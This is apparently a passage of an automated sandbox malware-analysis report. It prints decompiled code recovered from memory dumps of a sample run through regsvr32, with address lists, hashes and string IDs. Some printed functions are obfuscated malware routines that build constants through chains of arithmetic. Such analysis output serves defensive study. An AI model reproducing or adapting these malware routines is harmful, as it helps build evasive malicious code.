					if(_t96 == 0x9062539) {
						_t89 =  *0x4b56214; // 0x0
						__eflags = _t89 + 0x23c;
						return L04B3E204(_v536, _v540, _t89 + 0x23c, _t113);
					}
					if(_t96 != 0xe87ba20) {
						L15:
						__eflags = _t96 - 0xf0f6a33;
						if(__eflags != 0) {
							continue;
						}
						return _t88;
					}
					_v552 = 0x64b67d;
					_t101 = 0x4d;
					_v552 = _v552 / _t101;
					_v552 = _v552 << 1;
					_v552 = _v552 + 0xa638;
					_v552 = _v552 ^ 0x000343e6;
					_t113 =  &_v520 + E04B400C5( &_v520, _v532, _v524) * 2;
					while(1) {
						_t88 =  &_v520;
						if(_t113 <= _t88) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L8:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t74 =  &_v552;
						 *_t74 = _v552 - 1;
						__eflags =  *_t74;
						if( *_t74 == 0) {
							__eflags = _t113;
							L12:
							_t96 = 0x9062539;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t96 = 0x66ebf40;
				goto L15;
			}

0x04b407f4
0x04b407fa
0x04b40804
0x04b4080c
0x04b4081a
0x04b40823
0x04b40830
0x04b4083d
0x04b4084c
0x04b4084d
0x04b40856
0x04b4085a
0x04b40862
0x04b4086a
0x04b40872
0x04b4087a
0x04b40882
0x04b4088a
0x04b40892
0x04b4089a
0x04b408a2
0x04b408aa
0x04b408b2
0x04b408ba
0x04b408c8
0x04b408cc
0x04b408d0
0x04b408d5
0x04b408dd
0x04b408e5
0x04b408ea
0x04b408ee
0x04b408f6
0x00000000
0x04b408fe
0x04b4090c
0x04b40998
0x04b4099d
0x04b409a0
0x00000000
0x04b409a0
0x04b40910
0x04b409b7
0x04b409c0
0x00000000
0x04b409d1
0x04b40918
0x04b409a9
0x04b409a9
0x04b409af
0x00000000
0x00000000
0x00000000
0x04b409af
0x04b4091e
0x04b4092e
0x04b40935
0x04b40939
0x04b4093d
0x04b40945
0x04b4095f
0x04b40973
0x04b40973
0x04b40979
0x00000000
0x00000000
0x04b40964
0x04b40968
0x04b40970
0x04b40970
0x04b40970
0x00000000
0x04b40970
0x04b4096a
0x04b4096a
0x04b4096a
0x04b4096e
0x04b4097d
0x04b40980
0x04b40980
0x00000000
0x04b40980
0x00000000
0x04b4096e
0x00000000
0x04b4097b
0x04b409a7
0x00000000

Strings

W^)i, xrefs: 04B408EE
a9, xrefs: 04B4083D

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: W^)i$a9
API String ID: 0-1728637351
Opcode ID: 3579988161f8101d2fd56b537d1355d0066e52d9e1ed676d160c9dd25a132bae
Instruction ID: d323f4e5585b61d911d26d48d9117b646e82d4629ac51f8da0593fa03f08b49e
Opcode Fuzzy Hash: 3579988161f8101d2fd56b537d1355d0066e52d9e1ed676d160c9dd25a132bae
Instruction Fuzzy Hash: 40417572508341CBDB18DF64D58981FFBE1FBD4358F044A1EE2DA66260D370EA499F86

Uniqueness

Uniqueness Score: -1.00%

Function 04B37E79, Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B37E79(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t99;
				signed int _t101;
				void* _t105;
				signed int _t107;
				signed int _t108;
				char* _t109;
				intOrPtr* _t124;
				void* _t125;

				_t124 = __ecx;
				_v16 = 0xb54463;
				_v16 = _v16 + 0xffff3415;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffffe11b;
				_v16 = _v16 ^ 0xfff7a701;
				_v28 = 0xd77279;
				_v28 = _v28 | 0x400730c3;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xbb990da4;
				_v36 = 0xbcfff8;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000a6762;
				_v8 = 0xf31a9;
				_v8 = _v8 + 0xffff1e98;
				_v8 = _v8 ^ 0xb4a41066;
				_v8 = _v8 | 0xf0d45968;
				_v8 = _v8 ^ 0xf4f540ba;
				_v12 = 0xc524e1;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 5;
				_t107 = 0x45;
				_v12 = _v12 / _t107;
				_v12 = _v12 ^ 0x00048931;
				_v44 = 0x28a4d;
				_v44 = _v44 + 0x8441;
				_v44 = _v44 ^ 0x00037729;
				_v20 = 0x237a7e;
				_v20 = _v20 ^ 0x3c41f8ff;
				_v20 = _v20 | 0x4ede09cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x01f9a400;
				_v32 = 0xc1354c;
				_v32 = _v32 ^ 0xd017d736;
				_v32 = _v32 + 0xb685;
				_v32 = _v32 ^ 0xd0d9caff;
				_v24 = 0x1c6e66;
				_v24 = _v24 + 0xffff7553;
				_t108 = 0x67;
				_t109 =  &_v304;
				_v24 = _v24 / _t108;
				_v24 = _v24 ^ 0x000aa416;
				_v40 = 0xe04b7f;
				_v40 = _v40 ^ 0x3f01302b;
				_v40 = _v40 ^ 0x3feda652;
				while(1) {
					_t99 =  *_t124;
					if(_t99 == 0) {
						break;
					}
					if(_t99 == 0x2e) {
						 *_t109 = 0;
					} else {
						 *_t109 = _t99;
						_t109 = _t109 + 1;
						_t124 = _t124 + 1;
						continue;
					}
					L6:
					_t125 = E04B3801A(_v16,  &_v304, _v28);
					if(_t125 != 0) {
						L8:
						_t101 = L04B33362(_t124 + 1, _v12, _v44);
						_push(_v40);
						_push(_v24);
						_push(_t101 ^ 0x31e3fec1);
						_push(_t125);
						return E04B3EC31(_v20, _v32);
					}
					_t105 = E04B3483C(_v36, _v8,  &_v304);
					_t125 = _t105;
					if(_t125 != 0) {
						goto L8;
					}
					return _t105;
				}
				goto L6;
			}

0x04b37e84
0x04b37e86
0x04b37e8f
0x04b37e96
0x04b37e9a
0x04b37ea1
0x04b37ea8
0x04b37eaf
0x04b37eb6
0x04b37eba
0x04b37ec1
0x04b37ec8
0x04b37ecc
0x04b37ed3
0x04b37eda
0x04b37ee1
0x04b37ee8
0x04b37eef
0x04b37ef6
0x04b37efd
0x04b37f01
0x04b37f0a
0x04b37f0f
0x04b37f14
0x04b37f1b
0x04b37f22
0x04b37f29
0x04b37f30
0x04b37f37
0x04b37f3e
0x04b37f45
0x04b37f49
0x04b37f50
0x04b37f57
0x04b37f5e
0x04b37f65
0x04b37f6c
0x04b37f73
0x04b37f7d
0x04b37f80
0x04b37f86
0x04b37f89
0x04b37f90
0x04b37f97
0x04b37f9e
0x04b37faf
0x04b37faf
0x04b37fb3
0x00000000
0x00000000
0x04b37fa9
0x04b37fb7
0x04b37fab
0x04b37fab
0x04b37fad
0x04b37fae
0x00000000
0x04b37fae
0x04b37fba
0x04b37fcb
0x04b37fd0
0x04b37feb
0x04b37ff4
0x04b37ff9
0x04b38001
0x04b3800a
0x04b3800b
0x00000000
0x04b38011
0x04b37fdf
0x04b37fe4
0x04b37fe9
0x00000000
0x00000000
0x04b38019
0x04b38019
0x00000000

Strings

~z#, xrefs: 04B37F30
bg, xrefs: 04B37ECC

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: 7bc3ec51ab2b841c0757fad0c2ae9d456f195d9853c381979f58e21bc3efc2fe
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: 99414276C0021EDBDF59CFA5C8495EEBBB1BF54318F208199D451B6220D7B81A4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B45515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

(8r, xrefs: 04B45578
bWr, xrefs: 04B4551E

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: faf76dbcbdedecae204921fde27811b5306f5a29136de7dea74a8ddef4249673
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: D3413471C00219EFCF58DFA4C98A9EEBBB5FB04304F10818AD511B6260D3B46B85DF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001178A, Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1001178A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E10017BC1(E100286B6, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E10011159(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000FB5C(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E1000E7D9(_t225 - 0x14, _t222, 7);
								_t194 = 0x10058f50 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E1000E064();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E1000E808(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E1000E064();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E1000E808(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10011CA2))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E100131BC(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000E822(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000FB83(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E10014BD1(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E100102A7(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E10012DE4(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E1001322E(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E10014F27(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E100131BC(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000FB5C(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E1000E808(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E1000E808(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E1000E808(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E100111CF(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E1000E808(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E10017C60(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1001178a
0x1001178a
0x10011791
0x10011796
0x1001179a
0x1001179d
0x100117a4
0x100117ad
0x100117b0
0x100117d4
0x100117d7
0x10011803
0x10011806
0x10011809
0x10011816
0x10011816
0x1001181b
0x1001181e
0x10011834
0x10011834
0x10011837
0x10011839
0x10011888
0x1001188c
0x10011899
0x100118a2
0x100118ad
0x100118b3
0x100118b5
0x100118b8
0x100118e8
0x100118e8
0x100118eb
0x100118f1
0x100118f3
0x10011982
0x10011982
0x10011985
0x00000000
0x00000000
0x100118fb
0x10011902
0x10011904
0x10011906
0x1001194a
0x1001194f
0x1001196d
0x10011972
0x10011974
0x10011976
0x00000000
0x00000000
0x10011958
0x1001195a
0x10011c6b
0x10011c6e
0x10011c73
0x10011c73
0x10011c76
0x10011c76
0x10011c77
0x10011c7a
0x10011c7c
0x10011c7e
0x10011c7e
0x00000000
0x10011c7e
0x10011960
0x10011962
0x10011964
0x10011969
0x10011969
0x1001196c
0x1001196c
0x10011978
0x1001197b
0x1001197d
0x1001197f
0x00000000
0x1001197f
0x10011908
0x1001190b
0x1001190e
0x10011913
0x10011915
0x10011918
0x00000000
0x00000000
0x1001191d
0x10011923
0x10011928
0x10011931
0x10011934
0x10011937
0x00000000
0x00000000
0x1001193d
0x00000000
0x100119c0
0x100119c8
0x00000000
0x00000000
0x100119d2
0x00000000
0x00000000
0x100119ec
0x100119ee
0x100119ee
0x100119f1
0x100119f2
0x100119f5
0x100119f9
0x00000000
0x00000000
0x10011a08
0x10011a0c
0x00000000
0x00000000
0x10011a13
0x100119c9
0x100119c9
0x100119cb
0x00000000
0x00000000
0x10011a16
0x10011a1e
0x10011a21
0x10011a24
0x10011a28
0x10011a2b
0x10011a30
0x10011a32
0x10011a36
0x10011a3a
0x10011a3d
0x10011a42
0x10011a44
0x10011a46
0x10011a49
0x10011a4b
0x10011a50
0x10011a53
0x10011a58
0x10011a5a
0x10011a5c
0x10011a5c
0x10011a5a
0x10011a5f
0x10011a5f
0x10011a62
0x10011a63
0x10011a64
0x10011a67
0x10011a68
0x10011a6a
0x10011a6c
0x10011a70
0x10011a74
0x10011a77
0x10011a7a
0x10011a7e
0x00000000
0x00000000
0x10011a85
0x10011a8d
0x10011a90
0x10011a93
0x10011a96
0x10011a99
0x10011a9a
0x10011a9c
0x10011aa0
0x10011aa2
0x10011aa2
0x10011aa2
0x10011aa6
0x10011aa9
0x10011aa9
0x10011aac
0x10011ab0
0x00000000
0x00000000
0x10011aba
0x10011abd
0x10011abd
0x10011ac0
0x10011ac2
0x00000000
0x00000000
0x10011ad4
0x10011ad7
0x10011ad8
0x00000000
0x00000000
0x00000000
0x00000000
0x10011ae1
0x10011ae7
0x10011ae8
0x10011aeb
0x10011ac7
0x10011ac7
0x10011ac8
0x100119fe
0x100119fe
0x100119ff
0x10011a01
0x00000000
0x00000000
0x10011bee
0x00000000
0x00000000
0x10011af9
0x00000000
0x00000000
0x10011af0
0x10011af2
0x00000000
0x00000000
0x10011b04
0x10011b07
0x10011b08
0x00000000
0x00000000
0x10011b13
0x10011b16
0x10011b19
0x10011b1a
0x00000000
0x00000000
0x10011b27
0x10011b28
0x00000000
0x00000000
0x100119e6
0x10011bef
0x10011bef
0x00000000
0x00000000
0x100119d7
0x100119d9
0x00000000
0x00000000
0x10011b38
0x10011b3f
0x10011b40
0x10011b42
0x10011b45
0x00000000
0x00000000
0x10011b4d
0x10011b50
0x00000000
0x00000000
0x10011b57
0x10011b5a
0x00000000
0x00000000
0x10011b63
0x10011b66
0x10011b69
0x10011b6a
0x10011b6d
0x10011b6e
0x10011b71
0x00000000
0x00000000
0x10011b7b
0x00000000
0x00000000
0x10011b80
0x10011b81
0x10011b81
0x10011b86
0x10011b86
0x00000000
0x00000000
0x10011b8e
0x10011b8f
0x00000000
0x00000000
0x10011b94
0x10011b97
0x10011b9a
0x10011b9d
0x10011b9e
0x10011b9e
0x10011ba2
0x00000000
0x00000000
0x10011ba9
0x10011bad
0x10011bb2
0x10011bb2
0x00000000
0x00000000
0x10011bb8
0x10011bbb
0x10011bbd
0x00000000
0x00000000
0x10011bc4
0x10011bc7
0x10011bca
0x10011bcd
0x10011bd0
0x10011bd3
0x10011bd6
0x10011bd9
0x10011bea
0x10011beb
0x10011bf2
0x10011bf2
0x10011bf4
0x00000000
0x10011bf4
0x10011be1
0x10011be2
0x10011be5
0x00000000
0x00000000
0x10011bfb
0x10011bfc
0x10011bfc
0x10011bfe
0x00000000
0x00000000
0x10011c25
0x10011c26
0x10011c29
0x10011c2b
0x00000000
0x00000000
0x100119b0
0x100119b3
0x100119b6
0x100119b9
0x100119ba
0x100119ba
0x00000000
0x00000000
0x10011c02
0x10011c05
0x10011c06
0x10011c06
0x10011c09
0x10011c09
0x10011c0a
0x10011c0e
0x10011c0e
0x00000000
0x00000000
0x10011c11
0x10011c14
0x10011c17
0x10011c1a
0x10011c1b
0x10011c1b
0x10011c1c
0x10011c1f
0x10011c1f
0x10011c21
0x00000000
0x00000000
0x10011c32
0x10011c35
0x10011c38
0x10011c3b
0x10011c3c
0x10011c40
0x10011c43
0x10011c44
0x10011c48
0x10011c49
0x10011c4b
0x10011c4d
0x100117f6
0x100117f6
0x100117f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
